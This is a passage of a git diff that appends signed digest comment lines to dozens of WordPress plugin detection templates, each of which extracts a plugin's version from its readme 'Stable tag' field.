1 + http/technologies/wordpress/plugins/really-simple-ssl.yaml | 1 + http/technologies/wordpress/plugins/redirection.yaml | 1 + http/technologies/wordpress/plugins/redux-framework.yaml | 1 + http/technologies/wordpress/plugins/regenerate-thumbnails.yaml | 1 + http/technologies/wordpress/plugins/royal-elementor-addons.yaml | 1 + http/technologies/wordpress/plugins/safe-svg.yaml | 1 + http/technologies/wordpress/plugins/seo-by-rank-math.yaml | 1 + http/technologies/wordpress/plugins/sg-cachepress.yaml | 1 + http/technologies/wordpress/plugins/sg-security.yaml | 1 + http/technologies/wordpress/plugins/shortcodes-ultimate.yaml | 1 + .../wordpress/plugins/shortpixel-image-optimiser.yaml | 1 + .../wordpress/plugins/simple-custom-post-order.yaml | 1 + http/technologies/wordpress/plugins/siteguard.yaml | 1 + http/technologies/wordpress/plugins/siteorigin-panels.yaml | 1 + http/technologies/wordpress/plugins/smart-slider-3.yaml | 1 + http/technologies/wordpress/plugins/so-widgets-bundle.yaml | 1 + .../wordpress/plugins/sticky-header-effects-for-elementor.yaml | 1 + .../wordpress/plugins/stops-core-theme-and-plugin-updates.yaml | 1 + http/technologies/wordpress/plugins/sucuri-scanner.yaml | 1 + http/technologies/wordpress/plugins/table-of-contents-plus.yaml | 1 + http/technologies/wordpress/plugins/tablepress.yaml | 1 + http/technologies/wordpress/plugins/taxonomy-terms-order.yaml | 1 + http/technologies/wordpress/plugins/templately.yaml | 1 + http/technologies/wordpress/plugins/the-events-calendar.yaml | 1 + http/technologies/wordpress/plugins/tinymce-advanced.yaml | 1 + .../wordpress/plugins/translatepress-multilingual.yaml | 1 + .../wordpress/plugins/ultimate-addons-for-gutenberg.yaml | 1 + .../technologies/wordpress/plugins/under-construction-page.yaml | 1 + http/technologies/wordpress/plugins/updraftplus.yaml | 1 + http/technologies/wordpress/plugins/user-role-editor.yaml | 1 + http/technologies/wordpress/plugins/w3-total-cache.yaml | 1 + .../wordpress/plugins/webp-converter-for-media.yaml | 1 + http/technologies/wordpress/plugins/webp-express.yaml | 1 + .../wordpress/plugins/widget-importer-exporter.yaml | 1 + .../wordpress/plugins/woo-cart-abandonment-recovery.yaml | 1 + .../wordpress/plugins/woo-checkout-field-editor-pro.yaml | 1 + http/technologies/wordpress/plugins/woo-variation-swatches.yaml | 1 + .../wordpress/plugins/woocommerce-gateway-stripe.yaml | 1 + .../wordpress/plugins/woocommerce-legacy-rest-api.yaml | 1 + http/technologies/wordpress/plugins/woocommerce-payments.yaml | 1 + .../wordpress/plugins/woocommerce-paypal-payments.yaml | 1 + .../plugins/woocommerce-pdf-invoices-packing-slips.yaml | 1 + http/technologies/wordpress/plugins/woocommerce-services.yaml | 1 + http/technologies/wordpress/plugins/woocommerce.yaml | 1 + http/technologies/wordpress/plugins/wordfence.yaml | 1 + http/technologies/wordpress/plugins/wordpress-importer.yaml | 1 + http/technologies/wordpress/plugins/wordpress-seo.yaml | 1 + http/technologies/wordpress/plugins/worker.yaml | 1 + http/technologies/wordpress/plugins/wp-crontrol.yaml | 1 + http/technologies/wordpress/plugins/wp-fastest-cache.yaml | 1 + http/technologies/wordpress/plugins/wp-file-manager.yaml | 1 + http/technologies/wordpress/plugins/wp-google-maps.yaml | 1 + http/technologies/wordpress/plugins/wp-mail-smtp.yaml | 1 + http/technologies/wordpress/plugins/wp-maintenance-mode.yaml | 1 + http/technologies/wordpress/plugins/wp-migrate-db.yaml | 1 + http/technologies/wordpress/plugins/wp-multibyte-patch.yaml | 1 + http/technologies/wordpress/plugins/wp-optimize.yaml | 1 + http/technologies/wordpress/plugins/wp-pagenavi.yaml | 1 + http/technologies/wordpress/plugins/wp-reset.yaml | 1 + .../wordpress/plugins/wp-reviews-plugin-for-google.yaml | 1 + http/technologies/wordpress/plugins/wp-rollback.yaml | 1 + http/technologies/wordpress/plugins/wp-seopress.yaml | 1 + http/technologies/wordpress/plugins/wp-sitemap-page.yaml | 1 + http/technologies/wordpress/plugins/wp-smushit.yaml | 1 + http/technologies/wordpress/plugins/wp-statistics.yaml | 1 + http/technologies/wordpress/plugins/wp-super-cache.yaml | 1 + http/technologies/wordpress/plugins/wpcf7-recaptcha.yaml | 1 + http/technologies/wordpress/plugins/wpcf7-redirect.yaml | 1 + http/technologies/wordpress/plugins/wpforms-lite.yaml | 1 + http/technologies/wordpress/plugins/wps-hide-login.yaml | 1 + http/technologies/wordpress/plugins/wpvivid-backuprestore.yaml | 1 + .../wordpress/plugins/yith-woocommerce-wishlist.yaml | 1 + javascript/udp/detection/tftp-detect.yaml | 2 +- 201 files changed, 201 insertions(+), 1 deletion(-) diff --git a/http/technologies/wordpress/plugins/ad-inserter.yaml b/http/technologies/wordpress/plugins/ad-inserter.yaml index 3fd2256749..7cb24bd678 100644 --- a/http/technologies/wordpress/plugins/ad-inserter.yaml +++ b/http/technologies/wordpress/plugins/ad-inserter.yaml @@ -46,3 +46,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' +# digest: 4a0a0047304502201f21504b21a873bcdb94f678e1426bb07b9693c1a29fcc701e5a071aefeafda302210096be4cd588751d06eb4ea4fd3b8d37e73fa2217a3a085bc5813bf5c12965814c:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/add-to-any.yaml b/http/technologies/wordpress/plugins/add-to-any.yaml index 6a0d344b63..1f1966f689 100644 --- a/http/technologies/wordpress/plugins/add-to-any.yaml +++ b/http/technologies/wordpress/plugins/add-to-any.yaml @@ -46,3 +46,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' +# digest: 490a00463044022015ee64ab7e513fa0e9facd9c960d56ac2ae53fc5081a38e55f08199c23626ef2022053ed46df9e265ab8c9c74f1443ab51a46f26172ff5e4b312d5da13c63c98a324:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/admin-menu-editor.yaml b/http/technologies/wordpress/plugins/admin-menu-editor.yaml index 6fb5080bc8..2ab5a071fa 100644 --- a/http/technologies/wordpress/plugins/admin-menu-editor.yaml +++ b/http/technologies/wordpress/plugins/admin-menu-editor.yaml @@ -46,3 +46,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' +# digest: 490a0046304402206e7624bd3e49f6745065de72eb48f65ac369d2bdf06c0fbaaf8c5e5f962deb0c0220247db6de468795e38aaa4341b7ea91a287686be1975b5ebad7f89afe27f6b37e:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/advanced-custom-fields.yaml b/http/technologies/wordpress/plugins/advanced-custom-fields.yaml index cddbb4bb2e..294511fd09 100644 --- a/http/technologies/wordpress/plugins/advanced-custom-fields.yaml +++ b/http/technologies/wordpress/plugins/advanced-custom-fields.yaml @@ -46,3 +46,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' +# digest: 4a0a00473045022100efb4dea514e116df1f25917bc04f9416fafacd32e1c95658d3e08e5eafe0ad3f022045f1ac2343a0f9a9366156f85b3a8ba80b56c6c02218ce7e1665b71331b06ffa:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/akismet.yaml b/http/technologies/wordpress/plugins/akismet.yaml index 6f253f9f55..bd7a57609e 100644 --- a/http/technologies/wordpress/plugins/akismet.yaml +++ b/http/technologies/wordpress/plugins/akismet.yaml @@ -46,3 +46,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' +# digest: 490a0046304402207aab14790e4f66c7b2bfa9980f316354bdf5ec81549741b15698c4ace937f190022072c9060cc4acb75cbffc8d9ac31990343f61f718cf2d900145cc77957f751cee:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/all-in-one-seo-pack.yaml b/http/technologies/wordpress/plugins/all-in-one-seo-pack.yaml index fe45de4d04..08e75c64fb 100644 --- a/http/technologies/wordpress/plugins/all-in-one-seo-pack.yaml +++ b/http/technologies/wordpress/plugins/all-in-one-seo-pack.yaml @@ -46,3 +46,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' +# digest: 4a0a00473045022100bf092b9205b8d9541e6ae14d99d6365708308871c3fb1caf2679abd590d81c4a022023de00cceb053601c9a9c721ae505f157adcfde7b655e96df92a44a1b501ff85:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/all-in-one-wp-migration.yaml b/http/technologies/wordpress/plugins/all-in-one-wp-migration.yaml index 69e425f446..4ae1eb5193 100644 --- a/http/technologies/wordpress/plugins/all-in-one-wp-migration.yaml +++ b/http/technologies/wordpress/plugins/all-in-one-wp-migration.yaml @@ -46,3 +46,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' +# digest: 4a0a00473045022031cb29c2367d75a6e2f0ec8593a6153fd06659178df82cbd076ed747da46ccaa0221008ba7ab569858e57694985eb55609ad60901c83c6dfb2d04278fb89afcea73fa3:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/all-in-one-wp-security-and-firewall.yaml b/http/technologies/wordpress/plugins/all-in-one-wp-security-and-firewall.yaml index 9c07c65e4e..e6858f26ce 100644 --- a/http/technologies/wordpress/plugins/all-in-one-wp-security-and-firewall.yaml +++ b/http/technologies/wordpress/plugins/all-in-one-wp-security-and-firewall.yaml @@ -46,3 +46,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' +# digest: 490a0046304402202a69b3474655a566636757b569dc9c87cd8d71e4b41f3546dd707728026d0bb10220704d1472c8d4d32042642382bd1c0bfffef1cb319ab1468c1cd2206b2e2689bf:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/amp.yaml b/http/technologies/wordpress/plugins/amp.yaml index 92c8f5656e..b7678c04bc 100644 --- a/http/technologies/wordpress/plugins/amp.yaml +++ b/http/technologies/wordpress/plugins/amp.yaml @@ -46,3 +46,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' +# digest: 490a004630440220503330511cba927f339a2cc529aa6a47f7ff8ac5af6a368ca688e798509ff62302200707065d70186c1da325377c1533debab7fdab0fa6f36a9f87863aa56c957b9a:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/antispam-bee.yaml b/http/technologies/wordpress/plugins/antispam-bee.yaml index 70975a19a1..558897e867 100644 --- a/http/technologies/wordpress/plugins/antispam-bee.yaml +++ b/http/technologies/wordpress/plugins/antispam-bee.yaml @@ -46,3 +46,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' +# digest: 4a0a00473045022100d1dff588ce9184e77f359e828ee8839d1030fdeb4ceb3fcfff87cd2be584638f02207ed55f392fdd351e5fb31c495ff38eaec7ba6d3b8cf804a95e032b23d03071a1:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/astra-sites.yaml b/http/technologies/wordpress/plugins/astra-sites.yaml index fd7e3e99dd..801d439a1c 100644 --- a/http/technologies/wordpress/plugins/astra-sites.yaml +++ b/http/technologies/wordpress/plugins/astra-sites.yaml @@ -46,3 +46,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' +# digest: 4a0a0047304502204a399a389d356d9ec8cc864d7f8333d263d02e2d713fcfb712c12eae402a0c6a022100da402e1ce5b4443b4f2faa76abfd6eeadd549861b925f9c7776ef6549b46fcd7:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/autoptimize.yaml b/http/technologies/wordpress/plugins/autoptimize.yaml index 18f2a2ae84..bbf2320e2d 100644 --- a/http/technologies/wordpress/plugins/autoptimize.yaml +++ b/http/technologies/wordpress/plugins/autoptimize.yaml @@ -46,3 +46,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' +# digest: 4b0a00483046022100ff89da35c11650dbda7a76fd3d9bc28a8b1b65a05ff8bef2a8534765cbad5bdc022100df44496df86d8ece6eb3696bd11983d90f0a84de70b9e01b1e9aa4458ab245c5:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/backwpup.yaml b/http/technologies/wordpress/plugins/backwpup.yaml index 11cb41fb2c..0f457740ee 100644 --- a/http/technologies/wordpress/plugins/backwpup.yaml +++ b/http/technologies/wordpress/plugins/backwpup.yaml @@ -46,3 +46,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' +# digest: 490a004630440220624c4bd6450e2504dc2ab85bd73d3f6cf5e96591fea6e60adcd94c5dd3562cd10220615b5677ba732df6b192b55f703fd16c8cca6e2f15df8f9d6375b9d73ef6d4ba:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/better-search-replace.yaml b/http/technologies/wordpress/plugins/better-search-replace.yaml index df3c5f3a94..c8167b6783 100644 --- a/http/technologies/wordpress/plugins/better-search-replace.yaml +++ b/http/technologies/wordpress/plugins/better-search-replace.yaml @@ -46,3 +46,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' +# digest: 4b0a00483046022100865b486097acea255d08a77f0c6e2164d94a70c896b42c239be07662b95beee60221009fae18af3020f242cf914cae75c4e7f52a7451075ed0db79484ad7289b79d686:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/better-wp-security.yaml b/http/technologies/wordpress/plugins/better-wp-security.yaml index 6a50e049dc..6b4d172e13 100644 --- a/http/technologies/wordpress/plugins/better-wp-security.yaml +++ b/http/technologies/wordpress/plugins/better-wp-security.yaml @@ -46,3 +46,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' +# digest: 4a0a0047304502200254fc537503193fdd304ae1dc8ae6810e1261c511b28bbf2bb7a2da9824357602210097d2c41afbcb5edb86bad7de3d2d6ea9b2249bc38d288e9a12b58811387c33e7:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/black-studio-tinymce-widget.yaml b/http/technologies/wordpress/plugins/black-studio-tinymce-widget.yaml index e532694167..04b344f249 100644 --- a/http/technologies/wordpress/plugins/black-studio-tinymce-widget.yaml +++ b/http/technologies/wordpress/plugins/black-studio-tinymce-widget.yaml @@ -46,3 +46,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' +# digest: 490a004630440220411bee7cb8e483ddb01e190cdfd9ecf9c55c69d1f8dca53b862fc090fc413ddf02207ddcb8590399ece6b73771472821d4b360521f306395a5a0c042e3755b0ad96f:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/breadcrumb-navxt.yaml b/http/technologies/wordpress/plugins/breadcrumb-navxt.yaml index 4c6e616c1d..bc79cfec06 100644 --- a/http/technologies/wordpress/plugins/breadcrumb-navxt.yaml +++ b/http/technologies/wordpress/plugins/breadcrumb-navxt.yaml @@ -46,3 +46,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' +# digest: 4a0a00473045022025624c7fad1aa2cc61182345fe3bb00956b7130427c00ef9f64040212a749574022100bec83eba339fe2834911d4780efc6205073ef5aeea7fdbfd20c8903cb9de084e:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/breeze.yaml b/http/technologies/wordpress/plugins/breeze.yaml index a70a58690c..26f6988a54 100644 --- a/http/technologies/wordpress/plugins/breeze.yaml +++ b/http/technologies/wordpress/plugins/breeze.yaml @@ -46,3 +46,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' +# digest: 4a0a00473045022100cdd40e615ae58b0bb7ebe450c21f9ac1a745f3a1cc0c394d7f65aee021d71bfc0220744ca93c81ffa8ec72601ade1227a2aab417a21078f032a1e5b96c7028486d16:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/broken-link-checker.yaml b/http/technologies/wordpress/plugins/broken-link-checker.yaml index 4e3c68c53a..66cdc6861d 100644 --- a/http/technologies/wordpress/plugins/broken-link-checker.yaml +++ b/http/technologies/wordpress/plugins/broken-link-checker.yaml @@ -46,3 +46,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' +# digest: 4a0a0047304502201342fee7d49db8742ed3f66291388318ce79f40a7905d3a4e9df0b2e7ebb8274022100809e1d71d7d46457ee92e854f7c1e10bcce560ea5b3dc50468d8004c95a8e350:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/chaty.yaml b/http/technologies/wordpress/plugins/chaty.yaml index 0cd866179e..bc59a0e040 100644 --- a/http/technologies/wordpress/plugins/chaty.yaml +++ b/http/technologies/wordpress/plugins/chaty.yaml @@ -46,3 +46,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' +# digest: 4a0a004730450221008d7fec04dcddda2a11d6529e5cf22e419ddb4f90f2501ad4657a2e4310924461022036d5b78463ba4649e6d209bd872df678ca4968a1b8372ceb5b88b14bc3a9a07a:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/child-theme-configurator.yaml b/http/technologies/wordpress/plugins/child-theme-configurator.yaml index b1d8479d13..275ecfc796 100644 --- a/http/technologies/wordpress/plugins/child-theme-configurator.yaml +++ b/http/technologies/wordpress/plugins/child-theme-configurator.yaml @@ -46,3 +46,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' +# digest: 4a0a00473045022068f93f33abaa07592a6f0bbb09c34b328f26adb9c27a564c8f50768930bff681022100ffcf700555a3261639c4e6356be603fa788f883371c912af93b074b4930dd8da:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/classic-editor.yaml b/http/technologies/wordpress/plugins/classic-editor.yaml index 04e090313f..406f356578 100644 --- a/http/technologies/wordpress/plugins/classic-editor.yaml +++ b/http/technologies/wordpress/plugins/classic-editor.yaml @@ -46,3 +46,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' +# digest: 490a0046304402207a421d25a3e5777f659f5d9dd9858edef0aee7bdf5ef0dc96e28fa9fe78d76cb02200dcb39119c9ce365734dbb85a316be2b24e79a44aaf37b25ffb92f41fb7af04d:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/classic-widgets.yaml b/http/technologies/wordpress/plugins/classic-widgets.yaml index 57e618924b..9d2c2a246f 100644 --- a/http/technologies/wordpress/plugins/classic-widgets.yaml +++ b/http/technologies/wordpress/plugins/classic-widgets.yaml @@ -46,3 +46,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' +# digest: 4a0a00473045022045e7849e540774aa643af16d73d456bd7cbdff2a179d61c57750024b3bd0706b0221009f70b649f45e3001b60b0a567d8a4539da0dc7f4d1673d53c50fef34bce4154d:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/click-to-chat-for-whatsapp.yaml b/http/technologies/wordpress/plugins/click-to-chat-for-whatsapp.yaml index 571b3b20a3..d2703434c8 100644 --- a/http/technologies/wordpress/plugins/click-to-chat-for-whatsapp.yaml +++ b/http/technologies/wordpress/plugins/click-to-chat-for-whatsapp.yaml @@ -46,3 +46,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' +# digest: 4b0a00483046022100e5be11360f0e3cb59da6b84933d94c1f5b33595b6cebf3f3e6e48080d65cdacb022100fcf4ea61374db0fdbfbf71ad19e9009c37417a2a3d1dd5d2f4ea7f1c99ad2dd4:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/cmb2.yaml b/http/technologies/wordpress/plugins/cmb2.yaml index 4d562316b4..242144209c 100644 --- a/http/technologies/wordpress/plugins/cmb2.yaml +++ b/http/technologies/wordpress/plugins/cmb2.yaml @@ -46,3 +46,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' +# digest: 4a0a0047304502201a53ce8a6640a7200c1fe21a4306b341dabcf4457722ac04c9be07e9d0c153ab022100ea6c29d7ea3a6e642ec8d07830f28ac58b960d76e4efc8d03b0c77381f187410:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/coblocks.yaml b/http/technologies/wordpress/plugins/coblocks.yaml index dcea952545..e63295d602 100644 --- a/http/technologies/wordpress/plugins/coblocks.yaml +++ b/http/technologies/wordpress/plugins/coblocks.yaml @@ -46,3 +46,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' +# digest: 490a0046304402205ca383a870af26e8b1580b51dc0d2d3eeee1f5f49583e262a737439ee9c93e0e022054f138b70f165f28b92f6f4d66e0f2c960b82d2e65e7bfa0e07111fea9e92fd3:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/code-snippets.yaml b/http/technologies/wordpress/plugins/code-snippets.yaml index 0ae2f18122..8126c49a3f 100644 --- a/http/technologies/wordpress/plugins/code-snippets.yaml +++ b/http/technologies/wordpress/plugins/code-snippets.yaml @@ -46,3 +46,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' +# digest: 4a0a0047304502204017b775b5271995c95dc6826da7e39539c137ef05b8cbafb9b17699bd377ee7022100e2111faef0b209432dfb6a3e9d8e291998e34ecc21339324516c0e59463b8c59:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/coming-soon.yaml b/http/technologies/wordpress/plugins/coming-soon.yaml index 12f549d536..6ff19250ec 100644 --- a/http/technologies/wordpress/plugins/coming-soon.yaml +++ b/http/technologies/wordpress/plugins/coming-soon.yaml @@ -46,3 +46,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' +# digest: 490a00463044022052fcb17a6f0f602aeee8449561a16323640ade258c4094e45219902f628eb08202206d7d808926f3c403643cd08148dfce7f06280c15896b41de79b82a8564d74e82:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/complianz-gdpr.yaml b/http/technologies/wordpress/plugins/complianz-gdpr.yaml index d8ea6a72f1..fb2aade757 100644 --- a/http/technologies/wordpress/plugins/complianz-gdpr.yaml +++ b/http/technologies/wordpress/plugins/complianz-gdpr.yaml @@ -46,3 +46,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' +# digest: 4a0a0047304502210091bb00d92765756e517280fbfe535b0c1191eefdc687b6a2eb05d3b87f0f34a40220705ecc97045bb03425cf5381795e68f0b5072539b5431fe7a35cbeb9c8a25ebd:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/contact-form-7-honeypot.yaml b/http/technologies/wordpress/plugins/contact-form-7-honeypot.yaml index 4afaf9dc97..80539df5b2 100644 --- a/http/technologies/wordpress/plugins/contact-form-7-honeypot.yaml +++ b/http/technologies/wordpress/plugins/contact-form-7-honeypot.yaml @@ -46,3 +46,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' +# digest: 4a0a00473045022100fdff563b6f30c60c2d024c08bb598ad031ad7b45c176e6e015733e5c3859ad810220221f79f9675cfeb52e88d988812dad583c5ec0a9d80d29d113c035a0beef67ec:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/contact-form-7.yaml b/http/technologies/wordpress/plugins/contact-form-7.yaml index 88fea67f93..c0030fd3de 100644 --- a/http/technologies/wordpress/plugins/contact-form-7.yaml +++ b/http/technologies/wordpress/plugins/contact-form-7.yaml @@ -46,3 +46,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' +# digest: 4a0a00473045022024ffa2c78393c0e09e7a6efbcb99776756f6d42f747d00233c560bc569c9cf5d022100891983bc3d277dcfe79940ec977ef3c39805744a0708d81c19048ed580c9a6c4:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/contact-form-cfdb7.yaml b/http/technologies/wordpress/plugins/contact-form-cfdb7.yaml index d205cdbf36..9af5c3b1ce 100644 --- a/http/technologies/wordpress/plugins/contact-form-cfdb7.yaml +++ b/http/technologies/wordpress/plugins/contact-form-cfdb7.yaml @@ -46,3 +46,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' +# digest: 490a00463044022061360178e7bcdedf298c5c91189842687c91866891dbb445585951c82601a3e302206925d5926683fafbdc70fb8d2439558b286c28664cc5c49456f6fffd94d00db0:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/cookie-law-info.yaml b/http/technologies/wordpress/plugins/cookie-law-info.yaml index 3fa20df7d2..c35ab9623b 100644 --- a/http/technologies/wordpress/plugins/cookie-law-info.yaml +++ b/http/technologies/wordpress/plugins/cookie-law-info.yaml @@ -46,3 +46,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' +# digest: 4a0a00473045022013c85737d802221012862f6e1c095573ab229f036fba9da47f1fecefac5040d1022100a62b130f7563e773e04f8f2f89a96db9c37a85c22d1725051a0c27022a1948ac:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/cookie-notice.yaml b/http/technologies/wordpress/plugins/cookie-notice.yaml index bcd63ced86..0acfb86d47 100644 --- a/http/technologies/wordpress/plugins/cookie-notice.yaml +++ b/http/technologies/wordpress/plugins/cookie-notice.yaml @@ -46,3 +46,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' +# digest: 4a0a004730450220646be73e57deab9711216a617271f9594fbf6c46f0fdc103589a2dfa5a7b09350221009c6c9c700e30bf693d6a36aa66368c3e89ecb080517565f1026ff6185fb2ea0a:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/copy-delete-posts.yaml b/http/technologies/wordpress/plugins/copy-delete-posts.yaml index bca0326f2b..6de69f0cb9 100644 --- a/http/technologies/wordpress/plugins/copy-delete-posts.yaml +++ b/http/technologies/wordpress/plugins/copy-delete-posts.yaml @@ -46,3 +46,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' +# digest: 4a0a0047304502204893e1f4385e141ed856b9694975445db1a73ef6fc3acdf2d7820ec24457271c022100c4a70fefea588de7a6b5ea1af7e5ffd8daccdd48189dca9254cdd3bfb66f18b9:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/creame-whatsapp-me.yaml b/http/technologies/wordpress/plugins/creame-whatsapp-me.yaml index 854328f04b..b756c16009 100644 --- a/http/technologies/wordpress/plugins/creame-whatsapp-me.yaml +++ b/http/technologies/wordpress/plugins/creame-whatsapp-me.yaml @@ -46,3 +46,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' +# digest: 4a0a004730450221008178749a1e300440fae9488d54df908cf776530b8e831033b449e05161e4195502201d68273acb37be93c35fe25731377d84f17b583e8ce0af1373347ea2d8932231:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/creative-mail-by-constant-contact.yaml b/http/technologies/wordpress/plugins/creative-mail-by-constant-contact.yaml index 6d3f7f4566..e6e6fe6d35 100644 --- a/http/technologies/wordpress/plugins/creative-mail-by-constant-contact.yaml +++ b/http/technologies/wordpress/plugins/creative-mail-by-constant-contact.yaml @@ -46,3 +46,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' +# digest: 4a0a00473045022100d5f32177992c63fa490b8e49775c823158c906021bc3f3471eca5afbc0540c4b0220463d8dfab06722677247af97acaee963620853c1d9fcc66dee9ff9c29f2e5162:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/custom-css-js.yaml b/http/technologies/wordpress/plugins/custom-css-js.yaml index a923d21a15..27133fd53d 100644 --- a/http/technologies/wordpress/plugins/custom-css-js.yaml +++ b/http/technologies/wordpress/plugins/custom-css-js.yaml @@ -46,3 +46,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' +# digest: 4a0a00473045022100e63a0cf1d5377087b962173e118dd7a46c8c41e946b0591e5b76c2ef7e60f01b022054e7b4d4c7bd607e7ef979f5997ad41352cbe5deb86985254d909bcf644ecfbc:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/custom-fonts.yaml b/http/technologies/wordpress/plugins/custom-fonts.yaml index f10480fc8f..6d2538857a 100644 --- a/http/technologies/wordpress/plugins/custom-fonts.yaml +++ b/http/technologies/wordpress/plugins/custom-fonts.yaml @@ -46,3 +46,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' +# digest: 490a00463044022036046b049086918bfeddc97a71a5259f1b0540b08ad5d3f95aa39bfd42ce38920220036f051a90a9938d6a97cc07e51b3343dfc2826e76a569b218e75a31f0710e8e:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/custom-post-type-ui.yaml b/http/technologies/wordpress/plugins/custom-post-type-ui.yaml index 6c92091767..ba9b011d06 100644 --- a/http/technologies/wordpress/plugins/custom-post-type-ui.yaml +++ b/http/technologies/wordpress/plugins/custom-post-type-ui.yaml @@ -46,3 +46,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' +# digest: 